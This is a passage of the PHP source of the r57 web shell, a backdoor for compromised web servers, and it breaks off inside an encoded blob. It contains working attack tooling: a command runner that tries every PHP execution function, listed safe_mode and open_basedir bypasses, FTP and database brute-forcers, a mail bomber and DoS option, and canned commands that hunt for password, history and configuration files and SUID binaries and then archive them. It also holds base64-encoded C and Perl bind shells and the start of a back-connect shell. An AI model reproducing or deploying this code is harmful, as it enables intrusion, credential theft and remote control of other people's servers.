'tr_text80'=>'Cesit', 'tr_text81'=>'Net', 'tr_text82'=>'Databases', 'tr_text83'=>'SQL Sorgusu Yap', 'tr_text84'=>'SQL Sorgusu', 'tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'tr_text86'=>'Download files from server', 'tr_butt14'=>'Download', 'tr_text87'=>'Download files from remote ftp-server', 'tr_text88'=>'server:port', 'tr_text89'=>'File on ftp', 'tr_text90'=>'Transfer mode', 'tr_text91'=>'Archivation', 'tr_text92'=>'without arch.', 'tr_text93'=>'FTP', 'tr_text94'=>'FTP-bruteforce', 'tr_text95'=>'Users list', 'tr_text96'=>'Can\'t get users list', 'tr_text97'=>'checked: ', 'tr_text98'=>'success: ', 'tr_text99'=>'/etc/passwd', 'tr_text100'=>'Send file to remote ftp server', 'tr_text101'=>'Use reverse (user -> resu)', 'tr_text102'=>'Mail', 'tr_text103'=>'Send email', 'tr_text104'=>'Send file to email', 'tr_text105'=>'To', 'tr_text106'=>'From', 'tr_text107'=>'Subj', 'tr_butt15'=>'Send', 'tr_text108'=>'Mail', 'tr_text109'=>'Hide', 'tr_text110'=>'Show', 'tr_text111'=>'SQL-Server : Port', 'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)', 'tr_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)', 'tr_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)', 'tr_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'tr_text116'=>'Copy from', 'tr_text117'=>'to', 'tr_text118'=>'File copied', 'tr_text119'=>'Cant copy file', 'tr_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'tr_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'tr_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)', 'tr_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'tr_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)', 'tr_text125'=>'Data', 'tr_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'tr_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)', 'tr_text128'=>'Modify/Access date(touch)', 'tr_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)', 'tr_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'tr_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'tr_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'tr_text133'=>'', 'tr_text134'=>'Database-bruteforce', 'tr_text135'=>'Dictionary', 'tr_text136'=>'Creating evil symlink', 'tr_text137'=>'Useful', 'tr_text138'=>'Dangerous', 'tr_text139'=>'Mail Bomber', 'tr_text140'=>'DoS', 'tr_text141'=>'Danger! Web-daemon crash possible.', 'tr_err0'=>'Error! Can\'t write in file ', 'tr_err1'=>'Error! Can\'t read file ', 'tr_err2'=>'Error! Can\'t create ', 'tr_err3'=>'Error! Can\'t connect to ftp', 'tr_err4'=>'Error! Can\'t login on ftp server', 'tr_err5'=>'Error! Can\'t change dir on ftp', 'tr_err6'=>'Error! Can\'t sent mail', 'tr_err7'=>'Mail send', );
595 $aliases=array( '----------------------------------locate'=>'', 'locate httpd.conf files >> /tmp/grep.txt;
596cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;
597cat /tmp/grep.txt', 'locate vhosts.conf files >> /tmp/grep.txt;
598cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;
599cat /tmp/grep.txt', 'locate proftpd.conf files >> /tmp/grep.txt;
600cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;
601cat /tmp/grep.txt', 'locate psybnc.conf >> /tmp/grep.txt;
602cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;
603cat /tmp/grep.txt', 'locate my.conf files >> /tmp/grep.txt;
604cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;
605cat /tmp/grep.txt', 'locate admin.php files >> /tmp/grep.txt;
606cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;
607cat /tmp/grep.txt', 'locate cfg.php files >> /tmp/grep.txt;
608cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;
609cat /tmp/grep.txt', 'locate conf.php files >> /tmp/grep.txt;
610cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;
611cat /tmp/grep.txt', 'locate config.dat files >> /tmp/grep.txt;
612cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;
613cat /tmp/grep.txt', 'locate config.php files >> /tmp/grep.txt;
614cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;
615cat /tmp/grep.txt', 'locate config.inc files >> /tmp/grep.txt;
616cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;
617cat /tmp/grep.txt', 'locate config.inc.php files >> /tmp/grep.txt;
618cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;
619cat /tmp/grep.txt', 'locate config.default.php files >> /tmp/grep.txt;
620cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;
621cat /tmp/grep.txt', 'locate .conf files >> /tmp/grep.txt;
622cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;
623cat /tmp/grep.txt', 'locate .pwd files >> /tmp/grep.txt;
624cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;
625cat /tmp/grep.txt', 'locate .sql files >> /tmp/grep.txt;
626cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;
627cat /tmp/grep.txt', 'locate .htpasswd files >> /tmp/grep.txt;
628cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;
629cat /tmp/grep.txt', 'locate .bash_history files >> /tmp/grep.txt;
630cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;
631cat /tmp/grep.txt', 'locate .mysql_history files >> /tmp/grep.txt;
632cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;
633cat /tmp/grep.txt', 'locate backup files >> /tmp/grep.txt;
634cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;
635cat /tmp/grep.txt', 'locate dump files >> /tmp/grep.txt;
636cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;
637cat /tmp/grep.txt', 'locate priv files >> /tmp/grep.txt;
638cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;
639cat /tmp/grep.txt', '----------------------------------tar'=>'', 'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt', '----------------------------------1'=>'', 'locate access_log files >> /tmp/grep.txt;
640cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;
641cat /tmp/grep.txt', 'locate error_log files >> /tmp/grep.txt;
642cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;
643cat /tmp/grep.txt', 'locate access.log files >> /tmp/grep.txt;
644cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;
645cat /tmp/grep.txt', 'locate error.log files >> /tmp/grep.txt;
646cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;
647cat /tmp/grep.txt', 'locate ".log" files >> /tmp/grep.txt;
648cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;
649cat /tmp/grep.txt', '----------------------------------2'=>'', 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;
650cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt', '----------------------------------find'=>'', 'find suid files >> /tmp/grep.txt;
651cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls >> /tmp/grep.txt;
652cat /tmp/grep.txt', 'find suid files in current dir >> /tmp/grep.txt;
653cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls >> /tmp/grep.txt;
654cat /tmp/grep.txt', 'find sgid files >> /tmp/grep.txt;
655cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls >> /tmp/grep.txt;
656cat /tmp/grep.txt', 'find sgid files in current dir >> /tmp/grep.txt;
657cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls >> /tmp/grep.txt;
658cat /tmp/grep.txt', 'find all writable files >> /tmp/grep.txt;
659cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls >> /tmp/grep.txt;
660cat /tmp/grep.txt', 'find all writable files in current dir >> /tmp/grep.txt;
661cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls >> /tmp/grep.txt;
662cat /tmp/grep.txt', 'find all writable directories >> /tmp/grep.txt;
663cat /tmp/grep.txt'=>'find / -type d -perm -2 -ls >> /tmp/grep.txt;
664cat /tmp/grep.txt', 'find all writable directories in current dir >> /tmp/grep.txt;
665cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls >> /tmp/grep.txt;
666cat /tmp/grep.txt', 'find all writable directories and files >> /tmp/grep.txt;
667cat /tmp/grep.txt'=>'find / -perm -2 -ls >> /tmp/grep.txt;
668cat /tmp/grep.txt', 'find all writable directories and files in current dir >> /tmp/grep.txt;
669cat /tmp/grep.txt'=>'find . -perm -2 -ls >> /tmp/grep.txt;
670cat /tmp/grep.txt', 'find all .htpasswd files >> /tmp/grep.txt;
671cat /tmp/grep.txt'=>'find / -type f -name .htpasswd >> /tmp/grep.txt;
672cat /tmp/grep.txt', 'find all .bash_history files >> /tmp/grep.txt;
673cat /tmp/grep.txt'=>'find / -type f -name .bash_history >> /tmp/grep.txt;
674cat /tmp/grep.txt', 'find all .mysql_history files >> /tmp/grep.txt;
675cat /tmp/grep.txt'=>'find / -type f -name .mysql_history >> /tmp/grep.txt;
676cat /tmp/grep.txt', 'find all .fetchmailrc files >> /tmp/grep.txt;
677cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc >> /tmp/grep.txt;
678cat /tmp/grep.txt', 'find httpd.conf files >> /tmp/grep.txt;
679cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;
680cat /tmp/grep.txt', 'find vhosts.conf files >> /tmp/grep.txt;
681cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;
682cat /tmp/grep.txt', 'find proftpd.conf files >> /tmp/grep.txt;
683cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;
684cat /tmp/grep.txt', 'find admin.php files >> /tmp/grep.txt;
685cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;
686cat /tmp/grep.txt', 'find config* files >> /tmp/grep.txt;
687cat /tmp/grep.txt'=>'find / -type f -name "config*" >> /tmp/grep.txt;
688cat /tmp/grep.txt', 'find cfg.php files >> /tmp/grep.txt;
689cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;
690cat /tmp/grep.txt', 'find conf.php files >> /tmp/grep.txt;
691cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;
692cat /tmp/grep.txt', 'find config.dat files >> /tmp/grep.txt;
693cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;
694cat /tmp/grep.txt', 'find config.php files >> /tmp/grep.txt;
695cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;
696cat /tmp/grep.txt', 'find config.inc files >> /tmp/grep.txt;
697cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;
698cat /tmp/grep.txt', 'find config.inc.php files >> /tmp/grep.txt;
699cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;
700cat /tmp/grep.txt', 'find config.default.php files >> /tmp/grep.txt;
701cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;
702cat /tmp/grep.txt', 'find *.conf files >> /tmp/grep.txt;
703cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;
704cat /tmp/grep.txt', 'find *.pwd files >> /tmp/grep.txt;
705cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;
706cat /tmp/grep.txt', 'find *.sql files >> /tmp/grep.txt;
707cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;
708cat /tmp/grep.txt', 'find *backup* files >> /tmp/grep.txt;
709cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;
710cat /tmp/grep.txt', 'find *dump* files >> /tmp/grep.txt;
711cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;
712cat /tmp/grep.txt', '-----------------------------------'=>'', 'find /var/ access_log files >> /tmp/grep.txt;
713cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;
714cat /tmp/grep.txt', 'find /var/ error_log files >> /tmp/grep.txt;
715cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;
716cat /tmp/grep.txt', 'find /var/ access.log files >> /tmp/grep.txt;
717cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;
718cat /tmp/grep.txt', 'find /var/ error.log files >> /tmp/grep.txt;
719cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;
720cat /tmp/grep.txt', 'find /var/ "*.log" files >> /tmp/grep.txt;
721cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;
722cat /tmp/grep.txt', '----------------------------------------------------------------------------------------------------'=>'ls -la' );
723 $table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
724 $table_up2 = " ::</div></b></font></td></tr><tr><td>";
725 $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
726 $table_end1 = "</td></tr>";
727 $arrow = " <font face=Webdings color=gray>4</font>";
728 $lb = "<font color=green>[</font>";
729 $rb = "<font color=green>]</font>";
730 $font = "<font face=Verdana size=-2>";
731 $ts = "<table class=table1 width=100% align=center>";
732 $te = "</table>";
733 $fs = "<form name=form method=POST>";
734 $fe = "</form>";
735 if(isset($_GET['users'])) { if(!$users=get_users('/etc/passwd')) {echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>";
736} else { echo '<center>';
737 foreach($users as $user) {echo $user."<br>";
738} echo '</center>';
739 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
740die();
741 } if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);
742}else if(@function_exists('chroot')){@chroot($_POST['dir']);
743};
744} if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();
745};
746}else{$dir=$_POST['dir'];
747} $unix = 0;
748 if(strlen($dir)>1 &&$dir[1]==":") $unix=0;
749else $unix=1;
750 if(empty($dir)) { $os = getenv('OS');
751 if(empty($os)){$os = @php_uname();
752} if(empty($os)){$os ="-";
753$unix=1;
754} else { if(@eregi("^win",$os)) {$unix = 0;
755} else {$unix = 1;
756} } } if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text") { echo $head;
757 if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);
758} else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);
759} $sr->SearchText(0,0);
760 $res = $sr->GetResultFiles();
761 $found = $sr->GetMatchesCount();
762 $titles = $sr->GetTitles();
763 $r = "";
764 if($found >0) { $r .= "<TABLE width=100%>";
765 foreach($res as $file=>$v) { $r .= "<TR>";
766 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
767 $r .= (!$unix)?str_replace("/","\\",$file) : $file;
768 $r .= "</b></font></ TD>";
769 $r .= "</TR>";
770 foreach($v as $a=>$b) { $r .= "<TR>";
771 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
772 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
773 $r .= "</TR>\n";
774 } } $r .= "</TABLE>";
775 echo $r;
776 } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
777 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
778 die();
779 } if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;
780} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
781 if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";
782} function ws($i) { return @str_repeat("
783",$i);
784 } function ex($cfe) { $res = '';
785 if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res);
786 $res = join("\n",$res);
787 } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe);
788 } elseif(@function_exists('system')) { @ob_start();
789 @system($cfe);
790 $res = @ob_get_contents();
791 @ob_end_clean();
792 } elseif(@function_exists('passthru')) { @ob_start();
793 @passthru($cfe);
794 $res = @ob_get_contents();
795 @ob_end_clean();
796 } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = "";
797 if(@function_exists('fread') &&@function_exists('feof')){ while(!@feof($f)) {$res .= @fread($f,1024);
798} }else if(@function_exists('fgets') &&@function_exists('feof')){ while(!@feof($f)) {$res .= @fgets($f,1024);
799} } @pclose($f);
800 } elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes))) { $res = "";
801 if(@function_exists('fread') &&@function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);
802} }else if(@function_exists('fgets') &&@function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);
803} } @proc_close($f);
804 } elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
805 $pid = @pcntl_fork();
806 if ($pid == -1) { $res .= '[-] Could not children fork. Exit';
807 }else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';
808} else {$res .= '[-] Error. Command incorrect.';
809} }else { $cfe = array(" -e 'system(\"$cfe\")'");
810 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
811 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
812 die();
813 } } } return $res;
814 } function get_users($filename) { $users = array();
815 $rows=@explode("\n",readzlib($filename));
816 if(!$rows) return 0;
817 foreach ($rows as $string) { $user = @explode(":",trim($string));
818 if(substr($string,0,1)!='#') array_push($users,$user[0]);
819 } return $users;
820 } function err($n,$txt='') { echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
821 echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
822 if(!empty($txt)) {echo " $txt";
823} echo '</b></div></font></td></tr></table>';
824 return null;
825 } function perms($mode) { if (!$GLOBALS['unix']) return 0;
826 if( $mode &0x1000 ) {$type='p';
827} else if( $mode &0x2000 ) {$type='c';
828} else if( $mode &0x4000 ) {$type='d';
829} else if( $mode &0x6000 ) {$type='b';
830} else if( $mode &0x8000 ) {$type='-';
831} else if( $mode &0xA000 ) {$type='l';
832} else if( $mode &0xC000 ) {$type='s';
833} else $type='u';
834 $owner["read"] = ($mode &00400) ?'r': '-';
835 $owner["write"] = ($mode &00200) ?'w': '-';
836 $owner["execute"] = ($mode &00100) ?'x': '-';
837 $group["read"] = ($mode &00040) ?'r': '-';
838 $group["write"] = ($mode &00020) ?'w': '-';
839 $group["execute"] = ($mode &00010) ?'x': '-';
840 $world["read"] = ($mode &00004) ?'r': '-';
841 $world["write"] = ($mode &00002) ?'w': '-';
842 $world["execute"] = ($mode &00001) ?'x': '-';
843 if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';
844 if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';
845 if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';
846 $s=sprintf("%1s",$type);
847 $s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);
848 $s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);
849 $s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);
850 return trim($s);
851 } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." ";
852 if($size != 0) {$ret .= "size=".$size." ";
853} $ret .= "value=\"".$value."\"";
854 if($checked) $ret .= " checked";
855 return $ret.">";
856 } function which($pr) { $path = '';
857 $path = ex("which $pr");
858 if(!empty($path)) {return $path;
859}else {return false;
860} } function cf($fname,$text) { $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
861 if($w_file) { @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
862 @fclose($w_file);
863 } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
864 } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";
865} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";
866} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";
867} else {$size = $size ." B";
868} return $size;
869 } } function DirFilesR($dir,$types='') { $files = Array();
870 if(($handle = @opendir($dir)) ||(@function_exists('scandir'))) { while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir)))) { if ($file != "."&&$file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
871 else { $pos = @strrpos($file,".");
872 $ext = @substr($file,$pos,@strlen($file)-$pos);
873 if($types) { if(@in_array($ext,explode(';
874',$types))) $files[] = $dir."/".$file;
875 } else $files[] = $dir."/".$file;
876 } } } @closedir($handle);
877 } return $files;
878 } class SearchResult { var $text;
879 var $FilesToSearch;
880 var $ResultFiles;
881 var $FilesTotal;
882 var $MatchesCount;
883 var $FileMatschesCount;
884 var $TimeStart;
885 var $TimeTotal;
886 var $titles;
887 function SearchResult($dir,$text,$filter='') { $dirs = @explode(";
888",$dir);
889 $this->FilesToSearch = Array();
890 for($a=0;
891$a<count($dirs);
892$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
893 $this->text = $text;
894 $this->FilesTotal = @count($this->FilesToSearch);
895 $this->TimeStart = getmicrotime();
896 $this->MatchesCount = 0;
897 $this->ResultFiles = Array();
898 $this->FileMatchesCount = Array();
899 $this->titles = Array();
900 } function GetFilesTotal() {return $this->FilesTotal;
901} function GetTitles() {return $this->titles;
902} function GetTimeTotal() {return $this->TimeTotal;
903} function GetMatchesCount() {return $this->MatchesCount;
904} function GetFileMatchesCount() {return $this->FileMatchesCount;
905} function GetResultFiles() {return $this->ResultFiles;
906} function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text);
907 $delim = '|';
908 if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b';
909 $words = '('.@implode($delim,$qq).')';
910 $pattern = "/".$words."/";
911 if(!$case) $pattern .= 'i';
912 foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0;
913 $FileStrings = @file($filename) or @next;
914 for($a=0;
915$a<@count($FileStrings);
916$a++) { $count = 0;
917 $CurString = $FileStrings[$a];
918 $CurString = @Trim($CurString);
919 $CurString = @strip_tags($CurString);
920 $aa = '';
921 if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;
922'><b>\\1</b></SPAN>",$CurString);
923 $this->ResultFiles[$filename][$a+1] = $CurString;
924 $this->MatchesCount += $count;
925 $this->FileMatchesCount[$filename] += $count;
926 } } } $this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);
927 } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime());
928 return ((float)$usec +(float)$sec);
929 } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
930A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
931GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
932b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
933pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
934NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
935ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
936ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
9377DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9389tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
9392ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
940dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
941lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
942 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
943VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
944JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
945TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
946lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
947Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
948Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
949lIENPTk47DQpleGl0IDA7DQp9DQp9";
950 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
951aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
